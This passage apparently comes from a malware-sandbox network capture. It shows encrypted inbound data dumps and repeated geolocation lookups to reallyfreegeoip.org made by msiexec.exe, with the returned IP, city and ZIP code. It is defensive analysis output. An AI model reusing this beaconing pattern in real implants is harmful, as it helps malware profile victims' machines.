2024-12-24 10:28:24 UTC	1390	IN	Data Raw: d2 50 ee ef 0e 19 65 15 2d 3c 0c 4d 88 65 f0 ac bb 72 c4 16 3b 3a e7 f9 ea f1 d4 5d fe 6e f5 71 25 c4 53 93 dd 97 c5 ac 03 1a 4c 89 cc 10 3b 29 d9 bb 85 cc 4d e3 ed fb ac 4e 64 0e 14 35 4f 68 b7 bf 87 9e 15 e2 41 00 30 05 32 7b ff 00 9a 00 5e b8 89 89 ba 5f 16 c9 70 bf 9e be 08 36 83 d4 33 85 b2 9b 86 c1 17 40 b5 db e6 0c 71 89 9b b2 71 88 55 0e 46 e8 dd cb bd 58 ab ce 8d 0f 33 c4 fa 64 81 ae ec 6f b8 c8 43 fc 35 fc 56 36 79 8e b3 90 a5 89 68 76 33 c7 94 8b 1c 39 0f cb 70 ee da fc 7d 5b 44 70 eb a1 0b 3b ce a1 1b 8c be 58 05 81 a4 5e e7 ae d4 e2 7a b6 8c 28 c5 94 98 f6 72 83 53 b5 8b 8c 46 51 ab dc 36 36 d5 f0 bd 12 73 ad ba 6d 03 51 b9 90 ef 1a 90 e5 28 43 46 49 57 7d 09 32 cf 5b ef 55 fa a8 72 b4 3a 0a d2 ee 4f 3a 49 b8 c5 d8 2c b9 19 6a ab 25 28 ee a6 Data Ascii: Pe-<Mer;:]nq%SL;)MNd5OhA02{^_p63@qqUFX3doC5V6yhv39p}[Dp;X^z(rSFQ66smQ(CFIW}2[Ur:O:I,j%(
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: e4 d8 e5 ad 30 e0 95 aa 43 e1 4b 87 36 ed ca ad b9 3c 4a c8 b8 80 62 78 95 54 68 5e 7b e6 1f b5 ef 42 cb a6 49 39 47 ff a9 d8 9e 91 4e 61 14 68 87 9f fa 8f 0d db 6c 8a 87 e7 12 75 bd d4 7f be 9a 0e e4 bd ee 27 b0 a7 44 24 fa 50 c9 65 26 45 9e cc 4e f1 f9 2d 58 7c 56 a2 f2 9c 1f 3d bb a0 90 e4 e8 e9 c4 07 9e 49 88 03 64 a2 eb 58 fe 9d d9 59 a2 6f de 6d ea 11 ea c2 2e e8 55 c6 fd dd 83 9d 6f 73 12 e4 c3 4a 1a 73 15 03 08 ae 39 38 78 e4 b9 7d 05 fa 6a bb 21 f9 b4 f1 e7 19 bf ef bf 7d 98 be 0b 2f ae dd 4a 79 0c f5 0e 8c 36 b0 74 d1 3e 97 02 7b b2 09 24 d7 8b 1b e5 60 90 bd bd b2 53 c2 ee 53 d1 de 3b b6 82 d8 df 49 f4 2d 5d f0 2f 8b 47 02 ff d6 41 6a 1c ec c9 fb 8a e7 18 c6 23 06 a8 05 83 6d b2 5b b4 9e 60 a4 cb f9 15 4c 92 35 ad b0 64 dc 08 74 2d 0e 44 0d 96 Data Ascii: 0CK6<JbxTh^{BI9GNahlu'D$Pe&EN-X\|V=IdXYom.UosJs98x}j!}/Jy6t>{$`SS;I-]/GAj#m[`L5dt-D
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: e9 a0 b1 0f d9 be 50 c2 72 65 eb 26 b1 56 2a d7 df df 75 5d 8e d2 df c8 ce b8 0d 70 b1 9f 0a a1 8d e1 11 92 c7 60 76 32 c3 1a cc 82 a7 01 9d 96 ce 93 5d 63 fe fb 8e cf 5c fb d9 a3 cf 00 1a db 28 e4 48 ec 9d db 31 52 d0 46 2e 97 d7 23 eb e8 a8 42 13 2f 98 3c 83 ee 28 c1 80 e6 18 b4 7c 67 77 67 72 d1 a8 ab d3 90 82 76 9c 84 c7 d7 46 e2 9c 0d 1b 9c f0 d1 ed 55 49 da f2 db 3d de 62 97 e9 3a 87 5e bd 75 b9 b9 35 8a 9b b2 20 25 75 2b 68 cd 7a 12 50 53 3e 22 65 7d 7e dd 0b fb 63 c2 43 e5 b3 58 20 e1 72 95 de ea 07 a6 ea 9a ee 3e 91 db 0c 7c da a8 d1 2c ca 09 9c 34 86 fd e3 dd 64 4f 53 fe ed a2 30 65 25 9c 9b 95 bd da 33 75 46 3f fb 85 85 1d 62 3a 48 78 f5 78 ea 27 25 b7 f7 0d 4c 92 9a 16 30 d9 9b b2 77 2b 23 1c d9 17 54 46 57 58 10 9b 5a 64 e0 d1 2c ad 27 c3 1e Data Ascii: Pre&V*u]p`v2]c\(H1RF.#B/<(\|gwgrvFUI=b:^u5 %u+hzPS>"e}~cCX r>\|,4dOS0e%3uF?b:Hxx'%L0w+#TFWXZd,'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49887	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-24 10:28:29 UTC	854	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350898 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2akIFWlM2dBdObFMIGNhDsvbnH4gcOk43nqyR0BoIKiLOz55CYVb7QSX%2FbAVgGOhVCe3001lZfLkmBZeN9dh5pAqlxeMkAD68hccqf%2Bb9QAN75EVYADwDhwTtDNY2DEQV2ZL%2FS4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7a0ea8a7d20-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1991&rtt_var=757&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1437007&cwnd=207&unsent_bytes=0&cid=777f560eba982ae4&ts=451&x=0"
2024-12-24 10:28:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49893	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-24 10:28:31 UTC	856	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350900 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RfGDS0xwSE4W%2F87Q3eVvSQFD44NmDHp4YWeA6SLlmEkeB2fa0%2Bt2RaAyP2CKbxXUaCj1BPUsvYwKDVZBLVxnsQhOHdT45cLX1LfIpu1XdzVu8xDjE6k6kT8WqVEMes%2F6idzmok%2Fl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7adffb98cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1935&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1489795&cwnd=242&unsent_bytes=0&cid=80a3e7dc360ad1cf&ts=453&x=0"
2024-12-24 10:28:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49901	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-24 10:28:34 UTC	852	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350903 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCge3z9PFVDL0k9BJypdCVbZKDH51TaUcD0F%2FZupyRaNrdrszDdx5V2wmwm6d1spO%2FQEXyL5iGgn9wV2NCDcBz66MhvdG01NVmTtiqJRYWfASZrCF2LuLbfgmv1ktj1a0Zts68IV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7c11c7241ed-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2485&min_rtt=2480&rtt_var=940&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1158730&cwnd=211&unsent_bytes=0&cid=7f781761532a6733&ts=453&x=0"
2024-12-24 10:28:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49912	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-24 10:28:37 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350906 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqk3FBll33NZj327x%2BvbXYBlpFyPRXcLpqU%2F47CnYBtfFCysihgS3n%2BkFDnN4aosKBjxSt5%2BUmoRAzyIL%2BoA0GzR70tlRl9peAV4IcfJGjVG9BAolo0hENU06zz4UtVajRhGjnH%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7d42e5e8cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1948&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1445544&cwnd=186&unsent_bytes=0&cid=bea837ac4d13188f&ts=451&x=0"
2024-12-24 10:28:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49920	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-24 10:28:40 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350909 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSXw8S%2FQlLvND4bodJyqTaDoa2Wzh8gKdzC2TF%2FevTpfniK%2FmqZxs4SriZkSAI0gnYuNjBhBHDDB6KrUQKiPg%2B3%2FPJn9hcaPdihqTV98I2krljMLWM3N1%2FUCrP0rUJ330ZJmenbJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7e73b767c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1759&rtt_var=687&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1563169&cwnd=189&unsent_bytes=0&cid=862a572396642580&ts=452&x=0"
2024-12-24 10:28:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49930	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-24 10:28:43 UTC	856	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350912 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOjkJuIIFN%2FxnqQKC4IEM9JpsX83aJc1dTzC5Xw4iNpPSh4rF5QM0upGzw7WN54K9hE12RxXZ6MbcLIcJ8ocD%2FsRVpCOlRgbIYBEXQOFBq%2BXfQZ5eEJk%2BxWF8z0LPgM6CS2jzi37"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe7fa5fb3424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1581&rtt_var=626&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1704611&cwnd=248&unsent_bytes=0&cid=d8afc4affa5badc2&ts=454&x=0"
2024-12-24 10:28:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49938	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:46 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-24 10:28:46 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350915 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGj89ulfC72AxsddjIuqd0%2BDDojmr1iaTsM4OzzitzoWjID%2FgrV%2FfqyjlzqvbrazJqwSrn1V5550kXXiY3ALAF%2BMxuJiA4NCnvVMJrbDY1sWyw%2B4qywAYZKEqN%2BEplj6v163aTzi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe80d98d50f59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1455&min_rtt=1446&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1917268&cwnd=221&unsent_bytes=0&cid=63864643b58c58c0&ts=459&x=0"
2024-12-24 10:28:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49947	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:49 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-24 10:28:49 UTC	856	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350918 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8k0jyD3D2uOX3hLsJV%2BFE%2Fgl82icLmemGHIX6uD8GAi41629%2FDe4F7LLlfPTh368ayW0TzYcyXRnffQbbBOMl4uLlDevZTVwK%2BY6jTHTcKCjWvjamSbIozzcMe52eI8s2almczp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe820b95943ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1528&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1839949&cwnd=203&unsent_bytes=0&cid=4a069a3e76eede76&ts=447&x=0"
2024-12-24 10:28:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49957	172.67.177.134	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-24 10:28:52 UTC	858	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 350921 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thXtQMSgHbWV%2BUpN81G4YKQ5zJg8qAt71wHU0tzcR4x5XcPsdqHirg8bqVaN316LjyWIo6RyuJiP3DOLK8CHfMP4qyA%2Bh%2FayOXFT4zJn%2BbQSR95f%2BPXfMR8z5OWUp7mmGzrMiyka"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fe833b91641b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: 